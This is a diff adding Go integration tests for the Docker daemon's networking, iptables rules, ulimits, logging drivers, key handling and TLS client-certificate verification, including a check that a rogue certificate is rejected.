+	_, err = d.Cmd("run", "-d", "--name", "ExtContainer", "busybox", "top")
+	c.Assert(err, check.IsNil)
+
+	containerIP := d.findContainerIP("ExtContainer")
+	ip := net.ParseIP(containerIP)
+	c.Assert(bridgeIPNet.Contains(ip), check.Equals, true,
+		check.Commentf("Container IP-Address must be in the same subnet range : %s",
+			containerIP))
+}
+
+func (s *DockerDaemonSuite) TestDaemonBridgeNone(c *check.C) {
+	// start with bridge none
+	d := s.d
+	err := d.StartWithBusybox("--bridge", "none")
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	// verify docker0 iface is not there
+	out, _, err := runCommandWithOutput(exec.Command("ifconfig", "docker0"))
+	c.Assert(err, check.NotNil, check.Commentf("docker0 should not be present if daemon started with --bridge=none"))
+	c.Assert(strings.Contains(out, "Device not found"), check.Equals, true)
+
+	// verify default "bridge" network is not there
+	out, err = d.Cmd("network", "inspect", "bridge")
+	c.Assert(err, check.NotNil, check.Commentf("\"bridge\" network should not be present if daemon started with --bridge=none"))
+	c.Assert(strings.Contains(out, "No such network"), check.Equals, true)
+}
+
+func createInterface(c *check.C, ifType string, ifName string, ipNet string) (string, error) {
+	args := []string{"link", "add", "name", ifName, "type", ifType}
+	ipLinkCmd := exec.Command("ip", args...)
+	out, _, err := runCommandWithOutput(ipLinkCmd)
+	if err != nil {
+		return out, err
+	}
+
+	ifCfgCmd := exec.Command("ifconfig", ifName, ipNet, "up")
+	out, _, err = runCommandWithOutput(ifCfgCmd)
+	return out, err
+}
+
+func deleteInterface(c *check.C, ifName string) {
+	ifCmd := exec.Command("ip", "link", "delete", ifName)
+	out, _, err := runCommandWithOutput(ifCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	flushCmd := exec.Command("iptables", "-t", "nat", "--flush")
+	out, _, err = runCommandWithOutput(flushCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	flushCmd = exec.Command("iptables", "--flush")
+	out, _, err = runCommandWithOutput(flushCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) {
+	// TestDaemonBridgeIP Steps
+	// 1. Delete the existing docker0 Bridge
+	// 2. Set --bip daemon configuration and start the new Docker Daemon
+	// 3. Check if the bip config has taken effect using ifconfig and iptables commands
+	// 4. Launch a Container and make sure the IP-Address is in the expected subnet
+	// 5. Delete the docker0 Bridge
+	// 6. Restart the Docker Daemon (via deferred action)
+	//    This Restart takes care of bringing docker0 interface back to auto-assigned IP
+
+	defaultNetworkBridge := "docker0"
+	deleteInterface(c, defaultNetworkBridge)
+
+	d := s.d
+
+	bridgeIP := "192.169.1.1/24"
+	ip, bridgeIPNet, _ := net.ParseCIDR(bridgeIP)
+
+	err := d.StartWithBusybox("--bip", bridgeIP)
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	ifconfigSearchString := ip.String()
+	ifconfigCmd := exec.Command("ifconfig", defaultNetworkBridge)
+	out, _, _, err := runCommandWithStdoutStderr(ifconfigCmd)
+	c.Assert(err, check.IsNil)
+
+	c.Assert(strings.Contains(out, ifconfigSearchString), check.Equals, true,
+		check.Commentf("ifconfig output should have contained %q, but was %q",
+			ifconfigSearchString, out))
+
+	ipTablesSearchString := bridgeIPNet.String()
+	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
+	out, _, err = runCommandWithOutput(ipTablesCmd)
+	c.Assert(err, check.IsNil)
+
+	c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true,
+		check.Commentf("iptables output should have contained %q, but was %q",
+			ipTablesSearchString, out))
+
+	out, err = d.Cmd("run", "-d", "--name", "test", "busybox", "top")
+	c.Assert(err, check.IsNil)
+
+	containerIP := d.findContainerIP("test")
+	ip = net.ParseIP(containerIP)
+	c.Assert(bridgeIPNet.Contains(ip), check.Equals, true,
+		check.Commentf("Container IP-Address must be in the same subnet range : %s",
+			containerIP))
+	deleteInterface(c, defaultNetworkBridge)
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithBridgeIPChange(c *check.C) {
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	defer s.d.Restart()
+	if err := s.d.Stop(); err != nil {
+		c.Fatalf("Could not stop daemon: %v", err)
+	}
+
+	// now we will change the docker0's IP and then try starting the daemon
+	bridgeIP := "192.169.100.1/24"
+	_, bridgeIPNet, _ := net.ParseCIDR(bridgeIP)
+
+	ipCmd := exec.Command("ifconfig", "docker0", bridgeIP)
+	stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd)
+	if err != nil {
+		c.Fatalf("failed to change docker0's IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr)
+	}
+
+	if err := s.d.Start("--bip", bridgeIP); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+
+	//check if the iptables contains new bridgeIP MASQUERADE rule
+	ipTablesSearchString := bridgeIPNet.String()
+	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
+	out, _, err := runCommandWithOutput(ipTablesCmd)
+	if err != nil {
+		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
+	}
+	if !strings.Contains(out, ipTablesSearchString) {
+		c.Fatalf("iptables output should have contained new MASQUERADE rule with IP %q, but was %q", ipTablesSearchString, out)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) {
+	d := s.d
+
+	bridgeName := "external-bridge"
+	bridgeIP := "192.169.1.1/24"
+
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	args := []string{"--bridge", bridgeName, "--fixed-cidr", "192.169.1.0/30"}
+	err = d.StartWithBusybox(args...)
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	for i := 0; i < 4; i++ {
+		cName := "Container" + strconv.Itoa(i)
+		out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top")
+		if err != nil {
+			c.Assert(strings.Contains(out, "no available IPv4 addresses"), check.Equals, true,
+				check.Commentf("Could not run a Container : %s %s", err.Error(), out))
+		}
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr2(c *check.C) {
+	d := s.d
+
+	bridgeName := "external-bridge"
+	bridgeIP := "10.2.2.1/16"
+
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	err = d.StartWithBusybox("--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24")
+	c.Assert(err, check.IsNil)
+	defer s.d.Restart()
+
+	out, err = d.Cmd("run", "-d", "--name", "bb", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	defer d.Cmd("stop", "bb")
+
+	out, err = d.Cmd("exec", "bb", "/bin/sh", "-c", "ifconfig eth0 | awk '/inet addr/{print substr($2,6)}'")
+	c.Assert(out, checker.Equals, "10.2.2.0\n")
+
+	out, err = d.Cmd("run", "--rm", "busybox", "/bin/sh", "-c", "ifconfig eth0 | awk '/inet addr/{print substr($2,6)}'")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Equals, "10.2.2.2\n")
+}
+
+func (s *DockerDaemonSuite) TestDaemonBridgeFixedCIDREqualBridgeNetwork(c *check.C) {
+	d := s.d
+
+	bridgeName := "external-bridge"
+	bridgeIP := "172.27.42.1/16"
+
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	err = d.StartWithBusybox("--bridge", bridgeName, "--fixed-cidr", bridgeIP)
+	c.Assert(err, check.IsNil)
+	defer s.d.Restart()
+
+	out, err = d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	cid1 := strings.TrimSpace(out)
+	defer d.Cmd("stop", cid1)
+}
+
+func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Implicit(c *check.C) {
+	defaultNetworkBridge := "docker0"
+	deleteInterface(c, defaultNetworkBridge)
+
+	d := s.d
+
+	bridgeIP := "192.169.1.1"
+	bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP)
+
+	err := d.StartWithBusybox("--bip", bridgeIPNet)
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	expectedMessage := fmt.Sprintf("default via %s dev", bridgeIP)
+	out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0")
+	c.Assert(strings.Contains(out, expectedMessage), check.Equals, true,
+		check.Commentf("Implicit default gateway should be bridge IP %s, but default route was '%s'",
+			bridgeIP, strings.TrimSpace(out)))
+	deleteInterface(c, defaultNetworkBridge)
+}
+
+func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Explicit(c *check.C) {
+	defaultNetworkBridge := "docker0"
+	deleteInterface(c, defaultNetworkBridge)
+
+	d := s.d
+
+	bridgeIP := "192.169.1.1"
+	bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP)
+	gatewayIP := "192.169.1.254"
+
+	err := d.StartWithBusybox("--bip", bridgeIPNet, "--default-gateway", gatewayIP)
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	expectedMessage := fmt.Sprintf("default via %s dev", gatewayIP)
+	out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0")
+	c.Assert(strings.Contains(out, expectedMessage), check.Equals, true,
+		check.Commentf("Explicit default gateway should be %s, but default route was '%s'",
+			gatewayIP, strings.TrimSpace(out)))
+	deleteInterface(c, defaultNetworkBridge)
+}
+
+func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4ExplicitOutsideContainerSubnet(c *check.C) {
+	defaultNetworkBridge := "docker0"
+	deleteInterface(c, defaultNetworkBridge)
+
+	// Program a custom default gateway outside of the container subnet, daemon should accept it and start
+	err := s.d.StartWithBusybox("--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254")
+	c.Assert(err, check.IsNil)
+
+	deleteInterface(c, defaultNetworkBridge)
+	s.d.Restart()
+}
+
+func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+
+	// Start daemon without docker0 bridge
+	defaultNetworkBridge := "docker0"
+	deleteInterface(c, defaultNetworkBridge)
+
+	discoveryBackend := "consul://consuladdr:consulport/some/path"
+	err := s.d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend))
+	c.Assert(err, checker.IsNil)
+
+	// Start daemon with docker0 bridge
+	result := icmd.RunCommand("ifconfig", defaultNetworkBridge)
+	c.Assert(result, icmd.Matches, icmd.Success)
+
+	err = s.d.Restart(fmt.Sprintf("--cluster-store=%s", discoveryBackend))
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) {
+	d := s.d
+
+	ipStr := "192.170.1.1/24"
+	ip, _, _ := net.ParseCIDR(ipStr)
+	args := []string{"--ip", ip.String()}
+	err := d.StartWithBusybox(args...)
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	out, err := d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top")
+	c.Assert(err, check.NotNil,
+		check.Commentf("Running a container must fail with an invalid --ip option"))
+	c.Assert(strings.Contains(out, "Error starting userland proxy"), check.Equals, true)
+
+	ifName := "dummy"
+	out, err = createInterface(c, "dummy", ifName, ipStr)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, ifName)
+
+	_, err = d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top")
+	c.Assert(err, check.IsNil)
+
+	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
+	out, _, err = runCommandWithOutput(ipTablesCmd)
+	c.Assert(err, check.IsNil)
+
+	regex := fmt.Sprintf("DNAT.*%s.*dpt:8000", ip.String())
+	matched, _ := regexp.MatchString(regex, out)
+	c.Assert(matched, check.Equals, true,
+		check.Commentf("iptables output should have contained %q, but was %q", regex, out))
+}
+
+func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) {
+	testRequires(c, bridgeNfIptables)
+	d := s.d
+
+	bridgeName := "external-bridge"
+	bridgeIP := "192.169.1.1/24"
+
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	args := []string{"--bridge", bridgeName, "--icc=false"}
+	err = d.StartWithBusybox(args...)
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD")
+	out, _, err = runCommandWithOutput(ipTablesCmd)
+	c.Assert(err, check.IsNil)
+
+	regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName)
+	matched, _ := regexp.MatchString(regex, out)
+	c.Assert(matched, check.Equals, true,
+		check.Commentf("iptables output should have contained %q, but was %q", regex, out))
+
+	// Pinging another container must fail with --icc=false
+	pingContainers(c, d, true)
+
+	ipStr := "192.171.1.1/24"
+	ip, _, _ := net.ParseCIDR(ipStr)
+	ifName := "icc-dummy"
+
+	createInterface(c, "dummy", ifName, ipStr)
+
+	// But, Pinging external or a Host interface must succeed
+	pingCmd := fmt.Sprintf("ping -c 1 %s -W 1", ip.String())
+	runArgs := []string{"run", "--rm", "busybox", "sh", "-c", pingCmd}
+	_, err = d.Cmd(runArgs...)
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerDaemonSuite) TestDaemonICCLinkExpose(c *check.C) {
+	d := s.d
+
+	bridgeName := "external-bridge"
+	bridgeIP := "192.169.1.1/24"
+
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	args := []string{"--bridge", bridgeName, "--icc=false"}
+	err = d.StartWithBusybox(args...)
+	c.Assert(err, check.IsNil)
+	defer d.Restart()
+
+	ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD")
+	out, _, err = runCommandWithOutput(ipTablesCmd)
+	c.Assert(err, check.IsNil)
+
+	regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName)
+	matched, _ := regexp.MatchString(regex, out)
+	c.Assert(matched, check.Equals, true,
+		check.Commentf("iptables output should have contained %q, but was %q", regex, out))
+
+	out, err = d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("run", "--link", "icc1:icc1", "busybox", "nc", "icc1", "4567")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *check.C) {
+	bridgeName := "external-bridge"
+	bridgeIP := "192.169.1.1/24"
+
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	err = s.d.StartWithBusybox("--bridge", bridgeName, "--icc=false")
+	c.Assert(err, check.IsNil)
+	defer s.d.Restart()
+
+	_, err = s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top")
+	c.Assert(err, check.IsNil)
+	_, err = s.d.Cmd("run", "-d", "--name", "parent", "--link", "child:http", "busybox", "top")
+	c.Assert(err, check.IsNil)
+
+	childIP := s.d.findContainerIP("child")
+	parentIP := s.d.findContainerIP("parent")
+
+	sourceRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", childIP, "--sport", "80", "-d", parentIP, "-j", "ACCEPT"}
+	destinationRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", parentIP, "--dport", "80", "-d", childIP, "-j", "ACCEPT"}
+	if !iptables.Exists("filter", "DOCKER", sourceRule...) || !iptables.Exists("filter", "DOCKER", destinationRule...) {
+		c.Fatal("Iptables rules not found")
+	}
+
+	s.d.Cmd("rm", "--link", "parent/http")
+	if iptables.Exists("filter", "DOCKER", sourceRule...) || iptables.Exists("filter", "DOCKER", destinationRule...) {
+		c.Fatal("Iptables rules should be removed when unlink")
+	}
+
+	s.d.Cmd("kill", "child")
+	s.d.Cmd("kill", "parent")
+}
+
+func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	if err := s.d.StartWithBusybox("--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024"); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := s.d.Cmd("run", "--ulimit", "nproc=2048", "--name=test", "busybox", "/bin/sh", "-c", "echo $(ulimit -n); echo $(ulimit -p)")
+	if err != nil {
+		c.Fatal(out, err)
+	}
+
+	outArr := strings.Split(out, "\n")
+	if len(outArr) < 2 {
+		c.Fatalf("got unexpected output: %s", out)
+	}
+	nofile := strings.TrimSpace(outArr[0])
+	nproc := strings.TrimSpace(outArr[1])
+
+	if nofile != "42" {
+		c.Fatalf("expected `ulimit -n` to be `42`, got: %s", nofile)
+	}
+	if nproc != "2048" {
+		c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc)
+	}
+
+	// Now restart daemon with a new default
+	if err := s.d.Restart("--default-ulimit", "nofile=43"); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err = s.d.Cmd("start", "-a", "test")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	outArr = strings.Split(out, "\n")
+	if len(outArr) < 2 {
+		c.Fatalf("got unexpected output: %s", out)
+	}
+	nofile = strings.TrimSpace(outArr[0])
+	nproc = strings.TrimSpace(outArr[1])
+
+	if nofile != "43" {
+		c.Fatalf("expected `ulimit -n` to be `43`, got: %s", nofile)
+	}
+	if nproc != "2048" {
+		c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc)
+	}
+}
+
+// #11315
+func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatal(err)
+	}
+
+	if out, err := s.d.Cmd("run", "--name=test", "busybox"); err != nil {
+		c.Fatal(err, out)
+	}
+
+	if out, err := s.d.Cmd("rename", "test", "test2"); err != nil {
+		c.Fatal(err, out)
+	}
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatal(err)
+	}
+
+	if out, err := s.d.Cmd("start", "test2"); err != nil {
+		c.Fatal(err, out)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	id, err := s.d.getIDByName("test")
+	c.Assert(err, check.IsNil)
+
+	logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log")
+
+	if _, err := os.Stat(logPath); err != nil {
+		c.Fatal(err)
+	}
+	f, err := os.Open(logPath)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer f.Close()
+
+	var res struct {
+		Log    string    `json:"log"`
+		Stream string    `json:"stream"`
+		Time   time.Time `json:"time"`
+	}
+	if err := json.NewDecoder(f).Decode(&res); err != nil {
+		c.Fatal(err)
+	}
+	if res.Log != "testline\n" {
+		c.Fatalf("Unexpected log line: %q, expected: %q", res.Log, "testline\n")
+	}
+	if res.Stream != "stdout" {
+		c.Fatalf("Unexpected stream: %q, expected: %q", res.Stream, "stdout")
+	}
+	if !time.Now().After(res.Time) {
+		c.Fatalf("Log time %v in future", res.Time)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := s.d.Cmd("run", "--name=test", "--log-driver=none", "busybox", "echo", "testline")
+	if err != nil {
+		c.Fatal(out, err)
+	}
+	id, err := s.d.getIDByName("test")
+	c.Assert(err, check.IsNil)
+
+	logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log")
+
+	if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) {
+		c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) {
+	if err := s.d.StartWithBusybox("--log-driver=none"); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline")
+	if err != nil {
+		c.Fatal(out, err)
+	}
+	id, err := s.d.getIDByName("test")
+	c.Assert(err, check.IsNil)
+
+	logPath := filepath.Join(s.d.folder, "graph", "containers", id, id+"-json.log")
+
+	if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) {
+		c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) {
+	if err := s.d.StartWithBusybox("--log-driver=none"); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := s.d.Cmd("run", "--name=test", "--log-driver=json-file", "busybox", "echo", "testline")
+	if err != nil {
+		c.Fatal(out, err)
+	}
+	id, err := s.d.getIDByName("test")
+	c.Assert(err, check.IsNil)
+
+	logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log")
+
+	if _, err := os.Stat(logPath); err != nil {
+		c.Fatal(err)
+	}
+	f, err := os.Open(logPath)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer f.Close()
+
+	var res struct {
+		Log    string    `json:"log"`
+		Stream string    `json:"stream"`
+		Time   time.Time `json:"time"`
+	}
+	if err := json.NewDecoder(f).Decode(&res); err != nil {
+		c.Fatal(err)
+	}
+	if res.Log != "testline\n" {
+		c.Fatalf("Unexpected log line: %q, expected: %q", res.Log, "testline\n")
+	}
+	if res.Stream != "stdout" {
+		c.Fatalf("Unexpected stream: %q, expected: %q", res.Stream, "stdout")
+	}
+	if !time.Now().After(res.Time) {
+		c.Fatalf("Log time %v in future", res.Time)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneLogsError(c *check.C) {
+	c.Assert(s.d.StartWithBusybox("--log-driver=none"), checker.IsNil)
+
+	out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("logs", "test")
+	c.Assert(err, check.NotNil, check.Commentf("Logs should fail with 'none' driver"))
+	expected := `"logs" command is supported only for "json-file" and "journald" logging drivers (got: none)`
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) {
+	dir, err := ioutil.TempDir("", "socket-cleanup-test")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(dir)
+
+	sockPath := filepath.Join(dir, "docker.sock")
+	if err := s.d.Start("--host", "unix://"+sockPath); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := os.Stat(sockPath); err != nil {
+		c.Fatal("socket does not exist")
+	}
+
+	if err := s.d.Stop(); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := os.Stat(sockPath); err == nil || !os.IsNotExist(err) {
+		c.Fatal("unix socket is not cleaned up")
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) {
+	type Config struct {
+		Crv string `json:"crv"`
+		D   string `json:"d"`
+		Kid string `json:"kid"`
+		Kty string `json:"kty"`
+		X   string `json:"x"`
+		Y   string `json:"y"`
+	}
+
+	os.Remove("/etc/docker/key.json")
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Failed to start daemon: %v", err)
+	}
+
+	if err := s.d.Stop(); err != nil {
+		c.Fatalf("Could not stop daemon: %v", err)
+	}
+
+	config := &Config{}
+	bytes, err := ioutil.ReadFile("/etc/docker/key.json")
+	if err != nil {
+		c.Fatalf("Error reading key.json file: %s", err)
+	}
+
+	// byte[] to Data-Struct
+	if err := json.Unmarshal(bytes, &config); err != nil {
+		c.Fatalf("Error Unmarshal: %s", err)
+	}
+
+	//replace config.Kid with the fake value
+	config.Kid = "VSAJ:FUYR:X3H2:B2VZ:KZ6U:CJD5:K7BX:ZXHY:UZXT:P4FT:MJWG:HRJ4"
+
+	// NEW Data-Struct to byte[]
+	newBytes, err := json.Marshal(&config)
+	if err != nil {
+		c.Fatalf("Error Marshal: %s", err)
+	}
+
+	// write back
+	if err := ioutil.WriteFile("/etc/docker/key.json", newBytes, 0400); err != nil {
+		c.Fatalf("Error ioutil.WriteFile: %s", err)
+	}
+
+	defer os.Remove("/etc/docker/key.json")
+
+	if err := s.d.Start(); err == nil {
+		c.Fatalf("It should not be successful to start daemon with wrong key: %v", err)
+	}
+
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+
+	if !strings.Contains(string(content), "Public Key ID does not match") {
+		c.Fatalf("Missing KeyID message from daemon logs: %s", string(content))
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	out, err := s.d.Cmd("run", "-id", "busybox", "/bin/cat")
+	if err != nil {
+		c.Fatalf("Could not run /bin/cat: err=%v\n%s", err, out)
+	}
+	containerID := strings.TrimSpace(out)
+
+	if out, err := s.d.Cmd("kill", containerID); err != nil {
+		c.Fatalf("Could not kill %s: err=%v\n%s", containerID, err, out)
+	}
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatalf("Could not restart daemon: %v", err)
+	}
+
+	errchan := make(chan error)
+	go func() {
+		if out, err := s.d.Cmd("wait", containerID); err != nil {
+			errchan <- fmt.Errorf("%v:\n%s", err, out)
+		}
+		close(errchan)
+	}()
+
+	select {
+	case <-time.After(5 * time.Second):
+		c.Fatal("Waiting on a stopped (killed) container timed out")
+	case err := <-errchan:
+		if err != nil {
+			c.Fatal(err)
+		}
+	}
+}
+
+// TestHTTPSInfo connects via two-way authenticated HTTPS to the info endpoint
+func (s *DockerDaemonSuite) TestHTTPSInfo(c *check.C) {
+	const (
+		testDaemonHTTPSAddr = "tcp://localhost:4271"
+	)
+
+	if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem",
+		"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	args := []string{
+		"--host", testDaemonHTTPSAddr,
+		"--tlsverify", "--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/client-cert.pem",
+		"--tlskey", "fixtures/https/client-key.pem",
+		"info",
+	}
+	out, err := s.d.Cmd(args...)
+	if err != nil {
+		c.Fatalf("Error Occurred: %s and output: %s", err, out)
+	}
+}
+
+// TestHTTPSRun connects via two-way authenticated HTTPS to the create, attach, start, and wait endpoints.
+// https://github.com/docker/docker/issues/19280
+func (s *DockerDaemonSuite) TestHTTPSRun(c *check.C) {
+	const (
+		testDaemonHTTPSAddr = "tcp://localhost:4271"
+	)
+
+	if err := s.d.StartWithBusybox("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem",
+		"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	args := []string{
+		"--host", testDaemonHTTPSAddr,
+		"--tlsverify", "--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/client-cert.pem",
+		"--tlskey", "fixtures/https/client-key.pem",
+		"run", "busybox", "echo", "TLS response",
+	}
+	out, err := s.d.Cmd(args...)
+	if err != nil {
+		c.Fatalf("Error Occurred: %s and output: %s", err, out)
+	}
+
+	if !strings.Contains(out, "TLS response") {
+		c.Fatalf("expected output to include `TLS response`, got %v", out)
+	}
+}
+
+// TestTLSVerify verifies that --tlsverify=false turns on tls
+func (s *DockerDaemonSuite) TestTLSVerify(c *check.C) {
+	out, err := exec.Command(dockerdBinary, "--tlsverify=false").CombinedOutput()
+	if err == nil || !strings.Contains(string(out), "Could not load X509 key pair") {
+		c.Fatalf("Daemon should not have started due to missing certs: %v\n%s", err, string(out))
+	}
+}
+
+// TestHTTPSInfoRogueCert connects via two-way authenticated HTTPS to the info endpoint
+// by using a rogue client certificate and checks that it fails with the expected error.
+func (s *DockerDaemonSuite) TestHTTPSInfoRogueCert(c *check.C) {
+	const (
+		errBadCertificate   = "bad certificate"
+		testDaemonHTTPSAddr = "tcp://localhost:4271"
+	)
+
+	if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem",
+		"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	args := []string{
+		"--host", testDaemonHTTPSAddr,
+		"--tlsverify", "--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/client-rogue-cert.pem",
+		"--tlskey", "fixtures/https/client-rogue-key.pem",
+		"info",
+	}
+	out, err := s.d.Cmd(args...)
+	if err == nil || !strings.Contains(out, errBadCertificate) {
+		c.Fatalf("Expected err: %s, got instead: %s and output: %s", errBadCertificate, err, out)
+	}
+}
+
